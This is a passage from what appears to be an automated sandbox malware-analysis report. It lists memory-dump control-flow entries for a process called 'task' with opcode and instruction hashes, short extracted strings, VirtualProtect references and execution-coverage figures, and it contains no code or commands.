                                                      • Opcode Fuzzy Hash: 23db8d1d6e925cd72f4eea40f905e4c5d1d3e4eaedde78dd75652a6a282e2ba7
                                                      • Instruction Fuzzy Hash: 87616D7091874C8FEB54EF98D849BE9BBF0FB59314F0042AED409D7252DB34A945CB85

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.1523959912.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: bf8a549b58cc8a7833ae549e995e6506930b17b7ff0e1ebb1d247eb9a432c3c0
                                                      • Instruction ID: 90cdd8c9776dc391ef0dc9c5e4e92580c5fbb632d935fce6ed11c43962694e3f
                                                      • Opcode Fuzzy Hash: bf8a549b58cc8a7833ae549e995e6506930b17b7ff0e1ebb1d247eb9a432c3c0
                                                      • Instruction Fuzzy Hash: 29B1BC7090D7888FDB16DF68C855AE9BFB0EF17314F0541EBC089D7292DA34A949CB92

                                                      Execution Graph

                                                      Execution Coverage:18.3%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:51
                                                      Total number of Limit Nodes:7
                                                      [execution graph rendering omitted; the only API called from the graphed nodes is VirtualProtect]

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?M_^
                                                      • API String ID: 0-1086198800
                                                      • Opcode ID: f0653491a8f4bd74f59529de6079d5b4cd59df6ef2dcfb6bed7a4e19f83e97fa
                                                      • Instruction ID: ab13e0f4f7f755bee4a71025eae64e3399ee689bf00f042a5a09206b7a0e876e
                                                      • Opcode Fuzzy Hash: f0653491a8f4bd74f59529de6079d5b4cd59df6ef2dcfb6bed7a4e19f83e97fa
                                                      • Instruction Fuzzy Hash: A3B13F31A0D74D8FEB15DB68D8946FDBBB0FF56324F0482BAC049D7292DA30A845CB84

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?M_^
                                                      • API String ID: 0-1086198800
                                                      • Opcode ID: c6930ff2e4482ef1f3d14cd3256057bf3ab0c7987577b193bf2b380213dcbb33
                                                      • Instruction ID: 1e78e5d060ee776b510fb3a9ec1c1749841d9ce08cb1adfacd71f96f61cf7087
                                                      • Opcode Fuzzy Hash: c6930ff2e4482ef1f3d14cd3256057bf3ab0c7987577b193bf2b380213dcbb33
                                                      • Instruction Fuzzy Hash: A5811031A0CB5D8FEB54EB5CD8956F8BBF0FF56325F0042BAC04997252DB20A845CB81

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 93f23f74df5ba64e6c8f78317a99e825babce2c3ff755c5213cfb1c9c0a2ea62
                                                      • Instruction ID: 7b2cf8a08d44e0215ebfb29ff594bf72b42d1ae891a79abc9abf3eeab26c53dd
                                                      • Opcode Fuzzy Hash: 93f23f74df5ba64e6c8f78317a99e825babce2c3ff755c5213cfb1c9c0a2ea62
                                                      • Instruction Fuzzy Hash: 0A818C7080D7888FDB06DF688865AE9BFB0EF27305F1541EFC089D72A3D664A945CB52

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3eb6a440e516e1de3b7394a832ca3c872ba2d826800fcf4a8275f5469f3ccee
                                                      • Instruction ID: c9909307941c8f0c71d87c65f50c5f45412e588db00005792163c79ff290efea
                                                      • Opcode Fuzzy Hash: a3eb6a440e516e1de3b7394a832ca3c872ba2d826800fcf4a8275f5469f3ccee
                                                      • Instruction Fuzzy Hash: 5E71ED7190DB5D8FEB54DF58D899AF8BBF0FB56315F0042AAC04997252DB30A885CB81

                                                      Control-flow Graph

                                                      [control-flow graph rendering omitted; the only API called from the graphed blocks is VirtualProtect]
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cf7556ce160953a2387ca0ba01fc870034867e9379c9e1bc97b8255d97715fa6
                                                      • Instruction ID: 930668b0eb3b8e8412a152f1c880a86f3b47bf54484f6ea9008134943c145988
                                                      • Opcode Fuzzy Hash: cf7556ce160953a2387ca0ba01fc870034867e9379c9e1bc97b8255d97715fa6
                                                      • Instruction Fuzzy Hash: 3961DC7090CB4D8FEB54DF58D899AFDBBF0FB56315F0042AAC049A7252DB30A885CB81

                                                      Control-flow Graph (calls VirtualProtect; graph rendering not reproduced)
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6aa282c442b266fada54270abccd6a4b3483b47ba7dcc8b0f65e76a61a52b6f
                                                      • Instruction ID: e33c78136aa352161a9298110afe80ef2b5828dcddd23845f29f0e662617f4cb
                                                      • Opcode Fuzzy Hash: b6aa282c442b266fada54270abccd6a4b3483b47ba7dcc8b0f65e76a61a52b6f
                                                      • Instruction Fuzzy Hash: 51518C7090C74C8FEB54DF58D889AEDBBF0FB6A315F10426ED04AA3251DB30A985CB85

                                                      Control-flow Graph (calls VirtualProtect; graph rendering not reproduced)
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9843c5e50ef5ad09268ba2addc4394c214ffde8b878f2d726c901e536fc43b64
                                                      • Instruction ID: cc3630a9c1ed1db18090225515cdfd97f1bfed34adba9b9ad05942665debf373
                                                      • Opcode Fuzzy Hash: 9843c5e50ef5ad09268ba2addc4394c214ffde8b878f2d726c901e536fc43b64
                                                      • Instruction Fuzzy Hash: 5A515974908A0C8FDB58DF58D889BEDBBF1FB69315F10426ED04AE3251DB30A985CB85

                                                      Execution Graph (calls VirtualProtect; graph rendering not reproduced)

                                                      Execution Coverage: 8.7%
                                                      Dynamic/Decrypted Code Coverage: 100%
                                                      Signature Coverage: 0%
                                                      Total number of Nodes: 3
                                                      Total number of Limit Nodes: 0

                                                      Control-flow Graph (calls VirtualProtect; graph rendering not reproduced)
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4cb000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 700adbc10616650fef20f1847ed3608f3afb28380fbcd873c40e8562c54b70a1
                                                      • Instruction ID: 547211de2b04c5d048accff35af4c518f4b5fd5b0485b2612e08cd28a94beff8
                                                      • Opcode Fuzzy Hash: 700adbc10616650fef20f1847ed3608f3afb28380fbcd873c40e8562c54b70a1
                                                      • Instruction Fuzzy Hash: E751397090871C8FDB58DF98D885AEDBBF1FB69315F10426ED04AE3251DB70A985CB81

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c6000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 8799f0ccab458901e9d1de1cf9d123b24a60b6d6a3a4a10174f076fc20c3c978
                                                      • Instruction ID: 6565c8a2dd27a431806ba0a24862a09995c5cd784e7445aed2b274726930115d
                                                      • Opcode Fuzzy Hash: 8799f0ccab458901e9d1de1cf9d123b24a60b6d6a3a4a10174f076fc20c3c978
                                                      • Instruction Fuzzy Hash: 7391E07490D7998FEB46DF68C8557D97FF1EF5A300F0580EAC049D72A2DA389849CB90

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 3141549fb06b0a11e29eaf07cec3cd123f14b3635432065261e6aa06034ca409
                                                      • Instruction ID: accce362ba1519b47cd7bf83b14c98b5e5e2c9f69e27ecc1d2274cb6fea2f460
                                                      • Opcode Fuzzy Hash: 3141549fb06b0a11e29eaf07cec3cd123f14b3635432065261e6aa06034ca409
                                                      • Instruction Fuzzy Hash: 1C316B32B0DA054FF35DA66C685A2B57B86DBD6324B14827FE44FC3293DC15AC0742C9

                                                      Control-flow Graph (graph rendering not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: s
                                                      • API String ID: 0-4181575468
                                                      • Opcode ID: a880aa24db2fe71b4846b57b90639556ab0862ceabefaeff80f6f7606a0266bd
                                                      • Instruction ID: 07a53f1a272faf0b771305afda04e74e4add7bc13fade61afebb8fb09efa9a60
                                                      • Opcode Fuzzy Hash: a880aa24db2fe71b4846b57b90639556ab0862ceabefaeff80f6f7606a0266bd
                                                      • Instruction Fuzzy Hash: 40312676B099098FFB44BBACE8845EDB7E1EBC5325F108337D119D7282CD24580687E4

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: <M_^
                                                      • API String ID: 0-1376500734
                                                      • Opcode ID: 6a6c326d6d4c1289f198ab6f3c4c4e4e396064ed626109372963656c558f5079
                                                      • Instruction ID: 27d093b9e59fa5e637dd224485a775598e6d4430bfbce08213de46404e87f454
                                                      • Opcode Fuzzy Hash: 6a6c326d6d4c1289f198ab6f3c4c4e4e396064ed626109372963656c558f5079
                                                      • Instruction Fuzzy Hash: AC41B56140E7C98FE7279B2898A56D53FA09F43318F0980ABD089CE1A3DE38554EC7A5

                                                      Control-flow Graph (graph rendering not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6
                                                      • API String ID: 0-1452363761
                                                      • Opcode ID: 4ee25fba8cf79b3d0c765693080b41676aed63b040f8e4e2f164720ec1d8a2c7
                                                      • Instruction ID: c3c00ddd4c8c81d5a86ec954f5321521a8593a059658a353b16ad3760d0ee8bc
                                                      • Opcode Fuzzy Hash: 4ee25fba8cf79b3d0c765693080b41676aed63b040f8e4e2f164720ec1d8a2c7
                                                      • Instruction Fuzzy Hash: 53216D32F096094BFB58E76C9C4E6E6BBE1EB99324B048277E40DC7191DC24D80843C0

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: s
                                                      • API String ID: 0-4181575468
                                                      • Opcode ID: d9e64689ed0f31c53c94e66a9254fad746b31371c9e93e02ceeb4d6c48161a36
                                                      • Instruction ID: 44a107cd48e09325056ca7ff775501213a7e0eaa96ff248c0b267fb38298180f
                                                      • Opcode Fuzzy Hash: d9e64689ed0f31c53c94e66a9254fad746b31371c9e93e02ceeb4d6c48161a36
                                                      • Instruction Fuzzy Hash: 6221F774E0968DCFFB45EB68C4956EEBBB1EF46300F00857AD019DB282CE38A9058795

                                                      Control-flow Graph (graph rendering not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EP_H
                                                      • API String ID: 0-2752958874
                                                      • Opcode ID: 28275e9ba8a75df42550750607cde625ff41e31e65de31e1fbf0bba5945ba2da
                                                      • Instruction ID: 5d0f3f9bd08e6d150dbb5a6cb4ff4fe023322ebb9e7d01f5e1155253c9f48cf1
                                                      • Opcode Fuzzy Hash: 28275e9ba8a75df42550750607cde625ff41e31e65de31e1fbf0bba5945ba2da
                                                      • Instruction Fuzzy Hash: AB01F911A0EBC44FE386A73C5C6A1763FE1EB96215B4901E7E88CCB297DD1C9D1583E2

                                                      Control-flow Graph (graph rendering not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c6000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 7ec7a200bed4828ec74c8c504c4686357f04ecd740b481dae529fc8c86e3ab73
                                                      • Instruction ID: e6ca1ddf1092c5b964ca4458a17fefbc5dd561946c02df4f82eb4788d4337323
                                                      • Opcode Fuzzy Hash: 7ec7a200bed4828ec74c8c504c4686357f04ecd740b481dae529fc8c86e3ab73
                                                      • Instruction Fuzzy Hash: 98111970E0960D8FEB99DF68C4A5AECB7F1EB5A300F1081AAC40DE72A1DA3459448F55

                                                      Control-flow Graph (graph rendering not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c6000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "9
                                                      • API String ID: 0-1061052283
                                                      • Opcode ID: 63eaf7435d3da15181422a2d13685f60a7840fd08a71974c1308ab7fdecc90ac
                                                      • Instruction ID: bf09929d45cf42d3b3762cf9a4151cfb053150971e3bcc01b851dbbd6ba6a52b
                                                      • Opcode Fuzzy Hash: 63eaf7435d3da15181422a2d13685f60a7840fd08a71974c1308ab7fdecc90ac
                                                      • Instruction Fuzzy Hash: 50F04FB1D099598EFB98DB58D855AECBBA1FB14200F10C1BAC00EE7251DE2459818B45

                                                      Control-flow Graph (contains an internal call; graph rendering not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 728e5a22b860de79189568ed9fe2917d4ecb2b55fc419a9b837a3cda1c4237a5
                                                      • Instruction ID: e7e8c711765bc83f88d841bd43d604c573df91fa6058a374dbe29a1417063476
                                                      • Opcode Fuzzy Hash: 728e5a22b860de79189568ed9fe2917d4ecb2b55fc419a9b837a3cda1c4237a5
                                                      • Instruction Fuzzy Hash: 60E0D861A2DA464BF1CDFB28842E37CA1C2FB9A204F84A03EE44FC2187DC18AC054586

                                                      Control-flow Graph (graph rendering not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c6000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x
                                                      • API String ID: 0-2216521381
                                                      • Opcode ID: c796315573e23ec61ae5d6709181a42038d1bfbc4931f1888cce5feccdebb3a5
                                                      • Instruction ID: b8f7ce9348accbaabc445fbd6bd10adc2394d5eaba643f71b83224532a0e5030
                                                      • Opcode Fuzzy Hash: c796315573e23ec61ae5d6709181a42038d1bfbc4931f1888cce5feccdebb3a5
                                                      • Instruction Fuzzy Hash: 09F01C71A1891B8FF7E4EB28CC5A7E9A6A2FF58200F4084F9905DD2592DE345DC58B40

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3354d3f332e394945ac0dddb8bb4529be12810b78581d79f4690a4bd843e4916
                                                      • Instruction ID: 5686a1374d5a4f0879d5c35274fbf530e7bf579cbee1ec44ad73e42e8000327b
                                                      • Opcode Fuzzy Hash: 3354d3f332e394945ac0dddb8bb4529be12810b78581d79f4690a4bd843e4916
                                                      • Instruction Fuzzy Hash: B3512972E0D64ACFF752EB6CD8651ED7BF0EF42229B088277D049C7297DD14980A8794

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2bd37f3ed262a6a5f6dc715f543948d02131df5395171eb450d76aaf128e01f
                                                      • Instruction ID: f5d2cb43b47195d5c90bb7c06591d2b7873bad1e08cf75042ac2b56d460dd104
                                                      • Opcode Fuzzy Hash: a2bd37f3ed262a6a5f6dc715f543948d02131df5395171eb450d76aaf128e01f
                                                      • Instruction Fuzzy Hash: D4212671A08789CFEB02DBA8C8641EE7FF1FF46300F0442ABD045D7292DE28A905C791
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c23b11a07cedc9d9121ef17a2c36e05be2e3f11a3bc5093424ca7b8e75ba4b45
                                                      • Instruction ID: 91c71b4a08b9ce4eef780d049131e518d1c00ee5c88f893126584b474fd67783
                                                      • Opcode Fuzzy Hash: c23b11a07cedc9d9121ef17a2c36e05be2e3f11a3bc5093424ca7b8e75ba4b45
                                                      • Instruction Fuzzy Hash: 5EB17C7190D7D98FEB56DB3488647A47FB0AF17304F0A40EBC488DB1A3DA345A89CB52
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a38df8c2482f8cce7b25ac1ef97619ad3f48773292cef79947a62cd665c93f0
                                                      • Instruction ID: db4bb2a54a24f1e5f6c1b54d87612d75f2791f8a78bd22dd83587682d1acd696
                                                      • Opcode Fuzzy Hash: 3a38df8c2482f8cce7b25ac1ef97619ad3f48773292cef79947a62cd665c93f0
                                                      • Instruction Fuzzy Hash: EE517732A0965A8FE759FB38C84D6BA3BE1EF86314B40457AE40EC32D6DD28DC158380
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d72695f1b29db8f6b0986c50a9d5832f6326d130482672cfd48641eb0cc7ac1
                                                      • Instruction ID: 49ebd27aca787aa3a8ff5c34d3aa664ff7ab7b2317e0073f921efcfa2566cdcd
                                                      • Opcode Fuzzy Hash: 6d72695f1b29db8f6b0986c50a9d5832f6326d130482672cfd48641eb0cc7ac1
                                                      • Instruction Fuzzy Hash: BA51989191DBC68FF3C6A77884256A5BFE1EF52204F14C2BBD04FC7497ED18A8058792
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27037873c0ac9c68486ec48f01370d7aff94a424b99a43f3edea5cd74d4ab197
                                                      • Instruction ID: 1b471da7e968cbe4123648878232ac071f974832c0f8a31c9be5c4550bf912ff
                                                      • Opcode Fuzzy Hash: 27037873c0ac9c68486ec48f01370d7aff94a424b99a43f3edea5cd74d4ab197
                                                      • Instruction Fuzzy Hash: 2C31386250E3C55FE30B5B785C694B27FA8DB5323570542FFD0C5C60A3E848681BC396
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a2d7a76de398819e94ee171ca1c85b2ef5cef95e15aa80d8635cd223049b293
                                                      • Instruction ID: 5376af70b10779eabe822f0d37e266bdccd2934b461842e2b0a1b9cff55f000c
                                                      • Opcode Fuzzy Hash: 0a2d7a76de398819e94ee171ca1c85b2ef5cef95e15aa80d8635cd223049b293
                                                      • Instruction Fuzzy Hash: F641D36140E7C98FF7278B2888A52E53FA0AF42308F0481BBD089CB1A3DE289559C795
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62452325fecf641639f9486fb6490f3a538d09399b6d258655fec47c15051e47
                                                      • Instruction ID: 237440ee0cd8222e910c0edbd1d3a663462f7aa08fcedb302607d29437cc1221
                                                      • Opcode Fuzzy Hash: 62452325fecf641639f9486fb6490f3a538d09399b6d258655fec47c15051e47
                                                      • Instruction Fuzzy Hash: 3221F922A196994FD74DEB34C85E6AA3BA5EF86300F4441BEE40AC72E6DD68D9148740
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 967089682bec5c18206717e6f7377552425f07e21665e0b676d83f017317fe14
                                                      • Instruction ID: ec34e48548b0c7554c797797cff1c25a509a77d54288a9726e69fd92254d3f97
                                                      • Opcode Fuzzy Hash: 967089682bec5c18206717e6f7377552425f07e21665e0b676d83f017317fe14
                                                      • Instruction Fuzzy Hash: F811C866F1890A4BFB99B73C841A2BD61D7EBD8740B2584BAE44FC32C2DD2CDC424284
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ace01842c7a3f42f902cb6d5b7c33e6ba66cea64b8bf41864e33734a05227196
                                                      • Instruction ID: 42168449a63911714e9df8787b7a58fcc08a5b1ca98e4baacaf4a967a62402e2
                                                      • Opcode Fuzzy Hash: ace01842c7a3f42f902cb6d5b7c33e6ba66cea64b8bf41864e33734a05227196
                                                      • Instruction Fuzzy Hash: AA01D626E1A506DFFB99BF34805E67D22A2EF46304B408875D81FD338BDD2CEC094654
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C2000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c2000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fed099615e7fed80cf2b5859013ac7278532c7f4ecd2cf31685716053a8811c6
                                                      • Instruction ID: 0720b57a9720d5fd583e1755c0d56153c3a5f4822167a2de4585f9401b50c89b
                                                      • Opcode Fuzzy Hash: fed099615e7fed80cf2b5859013ac7278532c7f4ecd2cf31685716053a8811c6
                                                      • Instruction Fuzzy Hash: F601CCB250D68A8FE7B5EF28C8447E83B91FF4A318F0084B9940D8B295DE7899499784
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7bf0c16c3f85fe8ca1af86add914a1641bb1f3b0fc1b0676b9e0920ae6c7153c
                                                      • Instruction ID: a984a25ffb373b756ad78fad9de8f0526c06124cfefe83397b5bc05c7ac1641b
                                                      • Opcode Fuzzy Hash: 7bf0c16c3f85fe8ca1af86add914a1641bb1f3b0fc1b0676b9e0920ae6c7153c
